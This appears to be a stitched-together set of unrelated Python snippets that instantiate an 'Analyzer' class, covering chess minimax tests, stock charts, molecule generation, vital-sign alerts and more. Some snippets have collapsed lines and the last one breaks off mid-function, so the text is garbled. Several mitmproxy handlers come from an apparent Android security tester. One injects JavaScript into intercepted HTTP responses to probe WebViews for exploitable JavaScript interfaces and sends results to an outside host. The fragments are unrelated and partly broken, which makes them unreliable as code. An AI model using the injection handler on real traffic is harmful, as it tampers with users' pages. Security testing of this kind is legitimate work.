def handle_request(self, flow): if flow.request.path.find("?vulnerable_cve_3500") != -1: self.add_to_report( self.get_filter_id(), "Dynamically verified that application is vulnerable to CVE-3500" ) Analyzer.handle_request(self, flow)
def handle_request(self, flow): if flow.request.path.find("?vulnerable_javascript_injection") != -1: visited_url_index = flow.request.path.find("&url=") self.add_to_report(self.get_filter_id(), "Dynamically verified that malicious Javascript can be injected via HTTP via url %s" % base64.b64decode( flow.request.path[visited_url_index + 5:])) Analyzer.handle_request(self,flow)
def test_capture():
    print("testing simple capture and advance")
    print("\tsimple choice white")
    b = Board()
    b.board = [[0, 0, 0, 0, 0, 0, 0, -999],
               [0, 0, 0, 0, 0, 0, 0, 0],
               [0, 1, 0, 0, 0, 0, 0, 0],
               [-1, 0, -3, 0, 0, 0, 0, 0],
               [0, 0, 0, 0, 0, 0, 0, 0],
               [0, 0, 0, 0, 0, 0, 0, 0],
               [0, 0, 0, 0, 0, 0, 0, 0],
               [0, 0, 0, 0, 0, 0, 0, 999]]
    a = Analyzer()
    a.sd_limit = 2
    res = a.minimax(b, 20)
    assert(res.move == ((2, 1), (3, 2)))

    print("\tsimple choice black")
    b = Board()
    b.turn = -1
    b.board = [[0, 0, 0, 0, 0, 0, 0, 999],
               [0, 0, 0, 0, 0, 0, 0, 0],
               [0, 0, 0, 0, 0, 0, 0, 0],
               [1, 0, 3, 0, 0, 0, 0, 0],
               [0, -1, 0, 0, 0, 0, 0, 0],
               [0, 0, 0, 0, 0, 0, 0, 0],
               [0, 0, 0, 0, 0, 0, 0, 0],
               [0, 0, 0, 0, 0, 0, 0, -999]]
    # a = Analyzer(20)
    a.sd_limit = 2
    res = a.minimax(b, 20)
    assert(res.move == ((4, 1), (3, 2)))
def test_endgame_heuristics():
    a = Analyzer()
    b = Board()
    b.board = [[0, 5, 0, 0, 0, 0, 0, 0],
               [0, 0, 0, 0, 999, 0, 0, 0],
               [0, 0, 0, 0, 0, 0, 0, 0],
               [0, 0, 0, 0, 0, 0, 0, 0],
               [0, 0, 0, 0, 0, 0, 0, 0],
               [0, 0, 0, 0, 0, 0, 0, 0],
               [5, 0, 0, 0, 0, 0, 0, 0],
               [0, 0, 0, 0, 0, 0, 0, -999]]
    res = a.minimax(b, 200)
    print_move_chain(a, b, res)

    b = Board()
    b.turn = -1
    b.board = [[0, -5, 0, 0, 0, 0, 0, 0],
               [0, 0, 0, 0, -999, 0, 0, 0],
               [0, 0, 0, 0, 0, 0, 0, 0],
               [0, 0, 0, 0, 0, 0, 0, 0],
               [0, 0, 0, 0, 0, 0, 0, 0],
               [0, 0, 0, 0, 0, 0, 0, 0],
               [-5, 0, 0, 0, 0, 0, 0, 0],
               [0, 0, 0, 0, 0, 0, 0, 999]]
    res = a.minimax(b, 200)
    print_move_chain(a, b, res)
def __init__(self):
    self.ToCrawl = set([])
    self.Crawled = set([])
    self.Crawling = ""
    self.PageAnalyzer = Analyzer()  # used to extract useful info
    self.PageSniffer = Analyzer()   # used to find new pages to crawl
    self.initBrowser()
def runAnAnalyzer(channels, baseCuts, infile, outdir,
                  maxEvents, intLumi, cleanRows, cutModifiers):
    '''
    Run an Analyzer.
    Intended for use in threads, such that several processes all do this once.
    '''
    outfile = outdir+'/'+(infile.split('/')[-1])
    try:
        analyzer = Analyzer(channels, baseCuts, infile, outfile,
                            maxEvents, intLumi, cleanRows,
                            cutModifiers=cutModifiers)
    # Exceptions won't print from threads without help
    except Exception as e:
        print "**********************************************************************"
        print "EXCEPTION"
        print "Caught exception:"
        print e
        print "While initializing analyzer for {} with base cuts {} and modifiers [{}]".format(
            infile, baseCuts, ', '.join(m for m in cutModifiers))
        print "Killing task"
        print "**********************************************************************"
        return

    try:
        analyzer.analyze()
    except Exception as e:
        print "**********************************************************************"
        print "EXCEPTION"
        print "Caught exception:"
        print e
        print "While running analyzer for {} with base cuts {} and modifiers [{}]".format(
            infile, baseCuts, ', '.join(m for m in cutModifiers))
        print "Killing task"
        print "**********************************************************************"
        return
def main():
    analyzer = Analyzer(isTest, train_filename, test_filename,
                        test_answers, smoothing, cv_validation_percentage)
    (predicted, actual, tokens) = analyzer.run()
    accuracy, ten_mistakes = get_score(predicted, actual, tokens)
    print "Accuracy: " + str(accuracy)
    print "Ten Misclassifications: %s" % str(ten_mistakes)
def ch1Graph(self, resultDict, graph, startDate, endDate):
    ''' Sets title and labels for choice one, and graphs values. Returns analysis string.'''
    # Graph setup
    graph.set_title("Stock Price vs Time")  # Set graph title
    graph.set_xlabel("Date")                # Set x-axis label
    graph.set_ylabel("Stock Price")         # Set y-axis label
    # for each stock dictionary in the resultDict (list of dictionaries)
    for stock in resultDict:
        # Create list of dates from dictionary
        dateList = [date for date in sorted(
            stock['Time Series (Daily)'],
            key=lambda x: datetime.datetime.strptime(x, '%Y-%m-%d'))]
        # Create list of prices for corresponding dates
        prices = [stock['Time Series (Daily)'][date] for date in sorted(
            stock['Time Series (Daily)'],
            key=lambda x: datetime.datetime.strptime(x, '%Y-%m-%d'))]
        # Plot the prices
        graph.plot(prices, label=stock['Meta Data']['2. Symbol'])
    # Set legend in the best location
    graph.legend(loc='best')
    # Set 3 x-axis points
    graph.set_xticks([0, len(dateList) // 2, len(dateList) - 1])
    # Set corresponding dates on x-axis
    graph.set_xticklabels([dateList[0], dateList[(len(dateList) - 1) // 2], dateList[-1]])

    # Analysis
    a = Analyzer()
    # Get change and stock name from analysis of dictionary values
    analysis = a.compareOne(resultDict, startDate, endDate)
    # Return analysis string to GUI
    return analysis
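# Hedged illustration (not part of the original project): sorting ISO-format date
# strings chronologically with a strptime key, as ch1Graph does above. The variable
# names here are illustrative only. Note that for zero-padded '%Y-%m-%d' strings a
# plain lexicographic sort would give the same order; the strptime key makes the
# intent explicit and also rejects malformed dates.
import datetime

dates = ['2020-03-01', '2019-12-31', '2020-01-15']
ordered = sorted(dates, key=lambda x: datetime.datetime.strptime(x, '%Y-%m-%d'))
# ordered == ['2019-12-31', '2020-01-15', '2020-03-01']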
def handle_request(self, flow): if flow.request.scheme.endswith("https"): self.add_to_report( self.get_filter_id(), 'SSL connection to host %s, app not validating certificates properly' % (flow.request.headers["Host"][0] + flow.request.path)) Analyzer.handle_request(self, flow)
def getPupil(image, params):
    analysis = Analyzer(image, params)
    eyeData = analysis.getEyeData()
    reflections = eyeData.getReflection()
    likelyCandidate = eyeData.getPupilCentreCandidate(
        db.Eyeball.Eyeball.FilterOptions.REFLECTION)
    return likelyCandidate
def NegaMax(self, board, move, turn, depth, alpha, beta, tilesearchrange):
    #print("CURRENT POSITION", move, isMaximizingPlayer)
    if WinChecker(board).CheckBoth() or depth == 0:
        #print("REACHED TERMINAL")
        return (Analyzer(board).Grader(self.AIStoneType)
                - Analyzer(board).Grader(self.EnemyStoneType), move)
    v = -10000000
    for moves in self.aiutils.GetOpenMovesPlus(board, self.OpenSearchRange):
        score = -self.NegaMax(
            self.aiutils.GenerateCustomGameBoard(
                board, moves,
                self.AIStoneType if turn == self.EnemyStoneType else self.EnemyStoneType),
            moves,
            self.AIStoneType if turn == self.EnemyStoneType else self.EnemyStoneType,
            depth - 1, -beta, -alpha, tilesearchrange)[0]
        if score > v:
            v = score
        alpha = max(alpha, score)
        if alpha >= beta:
            print("AB CUTOFF")
            break
    return (v, move)
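# Hedged sketch (not from the original project): the same negamax-with-alpha-beta
# recurrence used by NegaMax above, reduced to a toy game tree given as nested lists,
# where a leaf is a number scored from the perspective of the side to move at that
# leaf. The function and example below are illustrative assumptions, not the
# project's API.
def negamax(node, depth, alpha, beta):
    if isinstance(node, (int, float)):  # leaf: score for the side to move
        return node
    if depth == 0:                      # depth limit: stand-in static evaluation
        return 0
    best = float('-inf')
    for child in node:
        # Negate the child's score and swap/negate the alpha-beta window.
        score = -negamax(child, depth - 1, -beta, -alpha)
        best = max(best, score)
        alpha = max(alpha, score)
        if alpha >= beta:
            break  # cutoff, the same pruning as the "AB CUTOFF" branch above
    return best

# negamax([[3, 5], [2, 9]], 2, float('-inf'), float('inf')) == 3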
def test_date_before_start_keyerror_should_appear(self):
    start = "2010-01-01"
    date = '2009-05-28'
    tickers = list(gt.get_biggest_n_tickers(40))
    b = Analyzer(tickers, start)
    #self.assertRaises(KeyError, lambda: b.winners(date, 25, 5))
    self.assertEqual(b.winners(date, 25, 5), [])
class Builder:
    def __init__(self):
        self.grabber = Grabber()
        self.analyzer = Analyzer()
        self.manipulator = Manipulator()

    def convertColor(self, hex_color):
        value = hex_color.lstrip('#')
        lv = len(value)
        return tuple(int(value[i:i+lv/3], 16) for i in range(0, lv, lv/3))

    def getCellColors(self, cells, progress_bar=False):
        cell_colors = [x[:] for x in [[0]*len(cells[0])]*len(cells)]
        if not progress_bar:
            for i in range(0, len(cells)):
                for j in range(0, len(cells[0])):
                    cell_colors[i][j] = self.convertColor(
                        self.analyzer.colorz(cells[i][j], 1)[0])
        else:
            for i in tqdm(range(0, len(cells)), ncols=50):
                for j in range(0, len(cells[0])):
                    cell_colors[i][j] = self.convertColor(
                        self.analyzer.colorz(cells[i][j], 1)[0])
        return cell_colors

    def calculateContrast(self, color1, color2):
        term1 = (color1[0] - color2[0])**2
        term2 = (color1[1] - color2[1])**2
        term3 = (color1[2] - color2[2])**2
        return math.sqrt(term1 + term2 + term3)

    def processImage(self, cell_file):
        cell_image = self.manipulator.crop_and_resize(
            Image.open(cell_file), subimage_width, subimage_height)
        subcells = self.manipulator.split_image(cell_image, 2, 2)
        cell_image_data = {'pixels': cell_image.tostring(),
                           'size': cell_image.size,
                           'mode': cell_image.mode}
        return (cell_image_data, self.getCellColors(subcells))
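# Hedged illustration (not part of the original project): standalone versions of the
# hex-to-RGB conversion and Euclidean RGB distance that Builder.convertColor and
# Builder.calculateContrast compute above. The function names here are illustrative
# assumptions; the math matches the snippet.
import math

def hex_to_rgb(hex_color):
    value = hex_color.lstrip('#')
    step = len(value) // 3
    return tuple(int(value[i:i + step], 16) for i in range(0, len(value), step))

def rgb_distance(c1, c2):
    return math.sqrt(sum((a - b) ** 2 for a, b in zip(c1, c2)))

# hex_to_rgb('#ff8800') == (255, 136, 0)
# rgb_distance((255, 136, 0), (255, 255, 255)) is roughly 281.4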
def training_phase(self) -> None:
    """ Trains model and generates graphs. """
    print("* Setting up training job.", flush=True)
    self.train_dataloader = self.get_dataloader(hdf_path=self.train_h5_path,
                                                data_description="training set")
    self.valid_dataloader = self.get_dataloader(hdf_path=self.valid_h5_path,
                                                data_description="validation set")

    self.load_training_set_properties()
    self.create_output_files()
    self.analyzer = Analyzer(valid_dataloader=self.valid_dataloader,
                             train_dataloader=self.train_dataloader,
                             start_time=self.start_time)

    start_epoch, end_epoch = self.define_model_and_optimizer()

    print("* Beginning training.", flush=True)
    for epoch in range(start_epoch, end_epoch):
        self.current_epoch = epoch
        avg_train_loss = self.train_epoch()
        avg_valid_loss = self.validation_epoch()

        util.write_model_status(epoch=self.current_epoch,
                                lr=self.optimizer.param_groups[0]["lr"],
                                training_loss=avg_train_loss,
                                validation_loss=avg_valid_loss)

    self.evaluate_model()
    self.print_time_elapsed()
def get_ts_properties(self, molecular_graphs: list, group_size: int) -> None:
    """
    Gets molecular properties for group of molecular graphs, only for the
    training set.

    Args:
    ----
        molecular_graphs (list) : Contains `PreprocessingGraph`s.
        group_size (int)        : Size of "group" (i.e. slice of graphs).
    """
    if self.is_training_set:
        analyzer = Analyzer()
        ts_properties = analyzer.evaluate_training_set(
            preprocessing_graphs=molecular_graphs)

        # merge properties of current group with the previous group analyzed
        if self.ts_properties:  # `self.ts_properties` is a dictionary
            self.ts_properties = analyzer.combine_ts_properties(
                prev_properties=self.ts_properties,
                next_properties=ts_properties,
                weight_next=group_size)
        else:  # `self.ts_properties` is None (has not been calculated yet)
            self.ts_properties = ts_properties
    else:
        self.ts_properties = None
def ch2Graph(self, resultDict, graph):
    ''' Sets title and labels for choice two. Calls _placeValues to plot values. Returns analysis string. '''
    # Graph setup
    graph.set_title("Monthly Price Percent Change for Stock Indices NASDAQ, S&P 500, Dow Jones during last 12 Months")  # Set title
    graph.set_xlabel("Date")  # Set x-axis label
    graph.set_ylabel("Percentage Change in Closing Price")  # Set y-axis label
    # For each index in resultDict (dictionary of lists)
    for index in resultDict:
        # Unzip dates and prices for each index - original dictionary has dates in most recent order
        dates, prices = zip(*reversed(resultDict[index]))
        # Create a numpy array and convert each price to float
        prices = np.array(prices).astype(float)
        # Compute percent change between each data point
        prices = [0] + ((np.diff(prices) / prices[:-1]) * 100)
        # Replace dictionary value with list of dates and price percent change
        resultDict[index] = [*zip(reversed(dates), reversed(prices))]
    # Graph dictionary values
    self._placeValues(resultDict, graph)

    # Analysis
    a = Analyzer()
    # Get percent change and index name from analysis of dictionary values
    analysis = a.compareTwo(resultDict)
    # Return analysis string with best performing index and its percent change to GUI
    return analysis
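# Hedged illustration (not part of the original project): the percent-change
# computation used in ch2Graph above, on a small array. The variable names are
# illustrative. One caution grounded in numpy semantics: `[0] + ndarray` adds 0
# elementwise via broadcasting rather than prepending it, so a leading 0 (to keep
# the series the same length as the dates) needs np.insert or np.concatenate.
import numpy as np

prices = np.array([100.0, 110.0, 99.0])
pct_change = (np.diff(prices) / prices[:-1]) * 100   # -> [10.0, -10.0]
padded = np.insert(pct_change, 0, 0.0)               # -> [0.0, 10.0, -10.0]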
def generation_phase(self) -> None:
    """ Generates molecules using a pre-trained model. """
    print("* Setting up generation job.", flush=True)
    self.load_training_set_properties()
    self.restart_epoch = self.constants.generation_epoch
    self.analyzer = Analyzer(valid_dataloader=None,
                             train_dataloader=None,
                             start_time=self.start_time)

    print(f"* Loading model from saved state (Epoch {self.restart_epoch}).",
          flush=True)
    model_path = self.constants.job_dir + f"model_restart_{self.restart_epoch}.pth"
    self.model = self.create_model()
    try:
        # for loading models created using GraphINVENT v1.0 (will raise an exception
        # if model was created with GraphINVENT v2.0)
        self.model.state_dict = torch.load(model_path).state_dict()
    except AttributeError:
        # for loading models created using GraphINVENT v2.0
        self.model.load_state_dict(torch.load(model_path))

    self.model.eval()
    with torch.no_grad():
        self.generate_graphs(n_samples=self.constants.n_samples)

    self.print_time_elapsed()
def main():
    # configuring Twitter API
    configurator = Configurator()
    api = configurator.returnAPI()

    analyzer = Analyzer(api)
    analyzer.filterByTerm("created_at", "tweets.json")
def get(self):
    user = users.get_current_user()
    if user:
        analyzer = Analyzer()
        analyzer.get(self)
    else:
        self.redirect(users.create_login_url(self.request.uri))
def handle_request(self, flow): if flow.request.path.find("?vulnerable_javascript_injection") != -1: visited_url_index = flow.request.path.find("&url=") self.add_to_report( self.get_filter_id(), "Dynamically verified that malicious Javascript can be injected via HTTP via url %s" % base64.b64decode(flow.request.path[visited_url_index + 5:])) Analyzer.handle_request(self, flow)
def handle_request(self, flow): if flow.request.path.find("?vulnerable_file_scheme") != -1: activity_index = flow.request.path.find("&activity=") self.add_to_report(self.get_filter_id(), "Dynamically verified that Javascript can be inyected running as file:// scheme via an Intent to " + base64.b64decode( flow.request.path[ activity_index + len( "&activity="):])) Analyzer.handle_request(self,flow)
def __init__(self, fileName):
    try:
        self.sourceFile = open(fileName, 'r')
    except IOError:
        sys.exit("Source file not found")
    self.scanner = Scanner(self.sourceFile)
    self.symbolTableStack = SymbolTableStack()
    self.analyzer = Analyzer(fileName, self.symbolTableStack)
def __init__(self, query, query_evidences, sf_object):
    Analyzer.__init__(self, query, query_evidences, sf_object)
    self.query_answer = sf_object.final_answers[query.id]
    # load country-province dict
    self.world_coutry_province = OrderedDict()
    f = io.open('data/dict/china_province_dict', 'r', -1, 'utf-8')
    province_dict = f.read().splitlines()
    self.world_coutry_province[u'中国'] = province_dict
def __init__(self, parent=None):
    super(MainWindow, self).__init__(parent)
    self.analyzer = Analyzer()
    self.currentSolution = None
    self._buildUI()
    self._loadSettings()
    QTimer.singleShot(0, self._loadInitialData)
def handle_request(self, flow): if flow.request.path.find("?vulnerable_file_scheme") != -1: activity_index = flow.request.path.find("&activity=") self.add_to_report( self.get_filter_id(), "Dynamically verified that Javascript can be inyected running as file:// scheme via an Intent to " + base64.b64decode( flow.request.path[activity_index + len("&activity="):])) Analyzer.handle_request(self, flow)
def test_file_parsing(self):
    an = Analyzer('data/trash.py', Node)
    res = an.process_file()
    self.assertEqual(len(res), 10)
    first = res[0]
    self.assertEqual(first.what, "os")
    self.assertIsNone(first.alias)
    self.assertEqual(first.who, "data.trash")
    self.assertEqual(first._extra, "os")
def __init__(self, redis_client: redis.client.Redis):
    timees = redis_client.get('redditUpdated').decode('UTF-8')
    print(timees)
    self.date_updated_reddit = float(timees)
    self.date_updated_twitter = False
    self.date_updated_coindesk = False
    self.redis_client = redis_client
    #self.preprocessor = Preprocessor(self.redis_client)
    self.analyzer = Analyzer(self.redis_client)
def simplify_all_clusters(self, euc_dist_threshold, dist_threshold, ang_threshold,
                          min_length, max_length, simplify_size):
    """
    Simplify all the clusters of the participant (which include all the draws)
    :param simplify_size:
    :param max_length: max length for stroke
    :param min_length: min length for stroke
    :param euc_dist_threshold: argument for group_stroke
    :param dist_threshold: argument for group_stroke
    :param ang_threshold: argument for group_stroke
    :return: Simplify clusters
    """
    print("Start clustering all participant draws")
    clusters = []
    for j, draw in enumerate(self.get_data()):
        print(f"{j} out of {len(self.get_data())}")
        clusters.extend(
            draw.group_strokes(euc_dist_threshold, dist_threshold, ang_threshold,
                               max_num_of_strokes=0, limit_strokes_num=False,
                               fixed_size_of_strokes=False)[1])
    self.clusters = clusters
    print("End clustering all participant draws\n")

    print("Start simplify all participant clusters")
    simplify_clusters = []
    indexes = []
    for i, draw in enumerate(clusters):
        print(f"{i} out of {len(clusters)}")
        x = []
        y = []
        for stroke in draw.get_data():
            x.extend(stroke.get_feature('x'))
            y.extend(stroke.get_feature('y'))
        p, num_of_stroke_in_simplify = simplify_cluster.simplify_cluster(x, y)
        if min_length < len(p) < max_length:
            if simplify_size:
                Analyzer.set_size(p, simplify_size)
            error = nearest_neighbor.calc_error(np.stack((x, y), axis=1), p)
            if error < 15:
                # if num_of_stroke_in_simplify == 1:
                indexes.append(i)
                simplify_clusters.append(p)
        else:
            simplify_clusters.append([[0, 0], [5000, 5000]])
    print("End simplify all participant clusters\n")
    return simplify_clusters, indexes
def handle_request(self, flow): if flow.request.path.find("?vulnerable_javascript_injection") != -1: visited_url_index = flow.request.path.find("&url=") interface_url_index = flow.request.path.find("&interface=") self.add_to_report(self.get_filter_id(), "Dynamically verified that malicious Javascript can be injected via HTTP via url %s and can run arbitrary code via the Javascript Interface %s" % ( base64.b64decode( flow.request.path[visited_url_index + len("&url="):]), flow.request.path[interface_url_index + len("&interface="):visited_url_index])) Analyzer.handle_request(self,flow)
def get(self):
    mid = request.args.get('mid')
    if mid:
        an = Analyzer(mid)
        if an.error:
            return {'message': 'cannot find talk'}
        else:
            an.start()
            return {'status': 'success'}
    else:
        return {'message': 'cannot find mid'}
def setUpClass(cls):
    cls.tickers = ['AAPL', 'MSFT']
    cls.analyzer = Analyzer(cls.tickers, start='2010-01-01')
    cls.aapl_long_3 = TradingRecord('AAPL', 3, '2010-01-05',
                                    cls.analyzer.stock_price('AAPL', '2010-01-05'))
    cls.aapl_short_3 = TradingRecord('AAPL', -3, '2010-01-15',
                                     cls.analyzer.stock_price('AAPL', '2010-01-15'))
    cls.msft_long_3 = TradingRecord('MSFT', 3, '2010-01-05',
                                    cls.analyzer.stock_price('MSFT', '2010-01-05'))
    cls.msft_short_3 = TradingRecord('MSFT', -3, '2010-01-15',
                                     cls.analyzer.stock_price('MSFT', '2010-01-15'))
    cls.records = {'AAPL': [cls.aapl_long_3, cls.aapl_short_3],
                   'MSFT': [cls.msft_long_3, cls.msft_short_3]}
    cls.analyzer_momentum = Analyzer(cls.tickers, start='2010-01-01')
def get_highest_freq_words(doc, n=None, calc_n=True):
    preprocesser = Preprocesser()
    d = {doc.id: doc.content}
    preprocesser.tokenize(d.items(), remove_stopwords=True)
    doc_tokenized = preprocesser.corpus_tokenized

    analyzer = Analyzer()
    freqs = analyzer.get_frequencies(doc_tokenized, None)

    if calc_n is True:
        n = int(len(freqs) / 20)
    elif n is None:
        n = len(freqs)

    return dict(freqs[:n])
def get_highest_freq_words(id, n=500, calc_m=True):
    serializer = Serializer()
    name = str(id) + "_tokens_stopwords-excluded_cs.corpus"
    corpus_tokenized = serializer.load(corpora_path + str(id) + "/" + name)

    analyzer = Analyzer()
    freqs = analyzer.get_frequencies(corpus_tokenized, n)

    # if calc_m is True:
    #     m = int(len(freqs)/2)
    # elif n is None:
    #     m = len(freqs)
    # return dict(freqs[:m])
    return dict(freqs)
def process_thread():
    while True:
        print("analyzing")
        data_dic = input_queue.get()
        if data_dic is None:
            break
        # use analyzer to trigger the alert
        myAnalyzer = Analyzer(data_dic["Systolic_BP"], data_dic["Diastolic_BP"],
                              data_dic["Heart_Rate"], data_dic["Heart_O2_Level"],
                              data_dic["Body_temp"])
        # call functions to trigger the alert
        Signal_Loss = myAnalyzer.Signal_Loss(myAnalyzer.Heart_Rate, myAnalyzer.Body_temp)
        Shock_Alert = myAnalyzer.Shock_Alert(myAnalyzer.Heart_Rate, myAnalyzer.Body_temp)
        Oxygen_Supply = myAnalyzer.Oxygen_Supply(myAnalyzer.Heart_O2_Level)
        Fever = myAnalyzer.Fever(myAnalyzer.Body_temp)
        Hypotension = myAnalyzer.Hypotension(myAnalyzer.Systolic_BP, myAnalyzer.Diastolic_BP)
        Hypertension = myAnalyzer.Hypertension(myAnalyzer.Systolic_BP, myAnalyzer.Diastolic_BP)
        # generate regular output based on presented data
        basic_result = receive_basic_iuput_data(Signal_Loss, Shock_Alert, Oxygen_Supply,
                                                Fever, Hypotension, Hypertension)
        time.sleep(1)
        print("done")
        output_queue.put(basic_result)
def process():
    # user_id, age, gender, heartrate, Systolic_BP, Diastolic_BP, blood_oxygen, temperature, time):
    # def __init__(self, Systolic_BP, Diastolic_BP, Heart_Rate, Heart_Oxy_Level, Body_temp):
    data = Input_module.input()
    time.sleep(0.5)
    for idx, content in enumerate(data):
        process = Analyzer(data[idx]["Systolic_BP"], data[idx]["Diastolic_BP"],
                           data[idx]["heartrate"], data[idx]["blood_oxygen"],
                           data[idx]["temperature"])
        signal_loss = process.Signal_Loss(data[idx]["heartrate"], data[idx]["temperature"])
        shock_alert = process.Shock_Alert(data[idx]["heartrate"], data[idx]["temperature"])
        oxygen_supply = process.Oxygen_Supply(data[idx]["blood_oxygen"])
        fever = process.Fever(data[idx]["temperature"])
        hypotension = process.Hypotension(data[idx]["Systolic_BP"], data[idx]["Diastolic_BP"])
        hypertension = process.Hypertension(data[idx]["Systolic_BP"], data[idx]["Diastolic_BP"])
        result = Output_Module.display_basic_iuput_data(
            signal_loss, shock_alert, oxygen_supply, fever, hypotension, hypertension)
        print('--------------------------------------')
        print('Patient No', idx, 'Alert')
        for index in result:
            print(index, ':', result[index])
def test_scenarios():
    # some puzzles from Reinfeld's Chess Tactics for Beginners
    print("testing move pruning")
    a = Analyzer()
    a.sd_limit = 4

    print("\tPuzzle #21")
    b = Board()
    b.board = [[0, 0, 0, 0, 0, 0, 0, 0],
               [0, 0, 0, 0, 0, 0, 0, 0],
               [0, -1, 9, 0, 0, 0, 0, 0],
               [0, 0, 0, 0, -999, -1, 0, 0],
               [0, 0, 0, 0, 0, 0, 0, 999],
               [0, 0, 0, 0, 0, 0, 0, -1],
               [0, 0, 0, 0, 0, 0, 0, 0],
               [-9, 0, 0, 0, 3, 0, 0, 0]]
    res = a.minimax(b, 100)
    print_move_chain(a, b, res)
    assert(res.move == ((7, 4), (5, 3)))

    # todo - pawn promotion is required for this one!
    # print("\tPuzzle #23")
    # b = Board()
    # b.turn = -1
    # b.board = [[0, 0, 0, 0, 0, 0, 0, 0],
    #            [0, 0, 999, 0, 0, 0, 0, -1],
    #            [-5, 0, 0, 0, 0, 0, 0, 0],
    #            [0, 0, 0, 0, 0, 0, 0, 0],
    #            [0, 0, 0, 0, 0, 0, 0, 0],
    #            [0, 0, 0, 0, 0, 0, 0, 0],
    #            [0, 0, 0, 0, 0, -999, 0, 0],
    #            [0, 0, 0, 0, 0, 0, 0, 5]]
    # res = a.minimax(b)
    # print_move_chain(b, res)

    print("\tPuzzle 52")
    b = Board()
    b.turn = -1
    b.board = [[0, 0, 5, 0, 0, 0, 999, 0],
               [0, 0, 0, 0, 0, 1, 1, 1],
               [1, 0, 0, -9, 0, 0, 0, 0],
               [0, 1, 0, 0, 0, 0, 0, 0],
               [0, 0, 0, 0, 0, 0, 0, 0],
               [-1, -1, 0, 0, 0, 0, 0, -1],
               [0, 0, 9, 0, 0, -1, -1, 0],
               [0, 0, 0, -5, 0, 0, -999, 0]]
    res = a.minimax(b, 100)
    print_move_chain(a, b, res)
def main():
    # user_id, age, gender, heartrate, Systolic_BP, Diastolic_BP, blood_oxygen, temperature, time):
    data = {}
    LINES = open("input").read().splitlines()
    for idx, line in enumerate(LINES):
        items = line.split()
        #print(items)
        Data = input_module(items[0], items[1], items[2], items[3], items[4],
                            items[5], items[6], items[7], items[8])
        #Data = input_module.implement_filter(Data)
        data[idx] = Data.dic
        print data[idx]

    # def __init__(self, Systolic_BP, Diastolic_BP, Heart_Rate, Heart_Oxy_Level, Body_temp):
    for idx, content in enumerate(data):
        process = Analyzer(data[idx]["Systolic_BP"], data[idx]["Diastolic_BP"],
                           data[idx]["heartrate"], data[idx]["blood_oxygen"],
                           data[idx]["temperature"])
        signal_loss = process.Signal_Loss(data[idx]["heartrate"], data[idx]["temperature"])
        shock_alert = process.Shock_Alert(data[idx]["heartrate"], data[idx]["temperature"])
        oxygen_supply = process.Oxygen_Supply(data[idx]["blood_oxygen"])
        fever = process.Fever(data[idx]["temperature"])
        hypotension = process.Hypotension(data[idx]["Systolic_BP"], data[idx]["Diastolic_BP"])
        hypertension = process.Hypertension(data[idx]["Systolic_BP"], data[idx]["Diastolic_BP"])
        result = Output_Module.display_basic_iuput_data(
            signal_loss, shock_alert, oxygen_supply, fever, hypotension, hypertension)
        print 'Patient', idx, 'Alert'
        print result
def handle_response(self, flow): print "request path is %s " % flow.request.path # If it's injectable and it's not the injected request requested_site = flow.request.headers["Host"][0] if flow.request.scheme.endswith("http") and requested_site.find( "www.fundacionsadosky.org.ar") == -1: visited_url = base64.b64encode(requested_site + flow.request.path) #taken from www.droidsec.org/tests/addjsif/ script = '''vulnerable=[];for(i in top){el=top[i];if(el==null){continue};if(typeof(el)==='function'){continue}try{top[i].getClass().forName('java.lang.Runtime');vulnerable.push(i)}catch(e){}}if(vulnerable.length>0){var request=new XMLHttpRequest();request.open("GET","http://www.fundacionsadosky.org.ar/?vulnerable_javascript_injection=true&interface="+vulnerable.join()+"&url=''' + visited_url + '''",true);request.onreadystatechange=function(){};request.send()}''' content_type = flow.response.headers.get("Content-Type") if not content_type: content_type = flow.response.headers.get("Content-type") if content_type and "text/html" in content_type[0]: with decoded(flow.response ): # automatically decode gzipped responses. if flow.response.content: try: response = flow.response.content print "Response is " + response root = lxml.html.fromstring(response) if root.find('.//*') is not None: print "TRIED MODIFYING /html " + requested_site + flow.request.path # is HTML, use lxml to insert to head, body or script append_in = root.find('.//head') if append_in is None: append_in = root.find('.//body') elif append_in is None: append_in = root.find( './/script').getparent() else: append_in = root script = lxml.html.fromstring('<script>' + script + '</script>') if append_in is not None: append_in.append(script) flow.response.content = lxml.html.tostring( root) except: print "There was a problem parsing the html response, skip it" # mimetype may be application/javascript or text/javascript elif content_type and "javascript" in content_type[0]: with decoded(flow.response ): # automatically decode gzipped responses. print "TRIED MODIFYING /javascript " + requested_site + flow.request.path # is searching for library .JS (both cases sensitive) or JQUERY flow.response.content = script.encode( "utf-8") + flow.response.content Analyzer.handle_response(self, flow)
def test_ticker_not_momentum_before_list(self):
    start_date = "2010-01-01"
    ranking_period = 25
    n = 5
    listeddate = "2010-06-28"
    s = 'TSLA'
    tickers = list(gt.get_biggest_n_tickers(40))
    b = Analyzer(tickers, start_date)
    self.assertEqual(
        b.appeartimes(start_date, ranking_period, n, listeddate, s, volume_filter=False),
        (0, 0))
def analyze(self, resource):
    analysis = Analyzer.analyze(self, resource)
    analysis.add_messages(self._lib_message_list)

    if self._js_lint_proc_args is None:
        analysis.mark_as_bad()
        analysis.add_error('No suitable JSLint runner (cscript.exe, node.js or rhino) could be found.')
        return analysis

    try:
        js_lint_proc = subprocess.Popen(self._js_lint_proc_args, -1, None,
                                        subprocess.PIPE, subprocess.PIPE, subprocess.PIPE)
        js_lint_proc_outputs = js_lint_proc.communicate(resource.content)
    except Exception as e:
        analysis.add_error("An exception was thrown while running JsLint: %s\n%s"
                           % (str(e), traceback.format_exc()))
        return analysis

    # The JSLint process returns 1 if it finds lint
    if js_lint_proc.returncode != 0 and js_lint_proc.returncode != 1:
        analysis.add_error('The JSLint process exited with return code %d\nArguments: %s\n Output: %s'
                           % (js_lint_proc.returncode, self._js_lint_proc_args, js_lint_proc_outputs))
        return analysis

    # Assume that JSLint produced no complaints until parsing one from the process output
    analysis.mark_as_good()

    for js_lint_proc_output in js_lint_proc_outputs:
        js_lint_complaints = js_lint_proc_output.split("Lint at ")
        for complaint in js_lint_complaints:
            if len(complaint.strip()):
                analysis.mark_as_bad()
                js_lint_complaint = JsLintComplaint(complaint)
                analysis.add_error(str(js_lint_complaint))

    return analysis
def find_matches(workflow_dir, keywords):
    workflows = Workflow.workflows_for_filestrings(Seeker.file_strings(workflow_dir))
    keyword_set = KeywordSet(keywords)
    if keyword_set.is_valid() == False:
        print(" > Invalid keywords")
        sys.exit()
    return Analyzer.workflows_for_keywords(keyword_set, workflows)
def handle_game_create(json, methods=["GET", "POST"]):
    if json["gid"] == "lobby" or json["gid"] in games.keys():
        return
    grid = Grid(json["width"], json["height"], True)
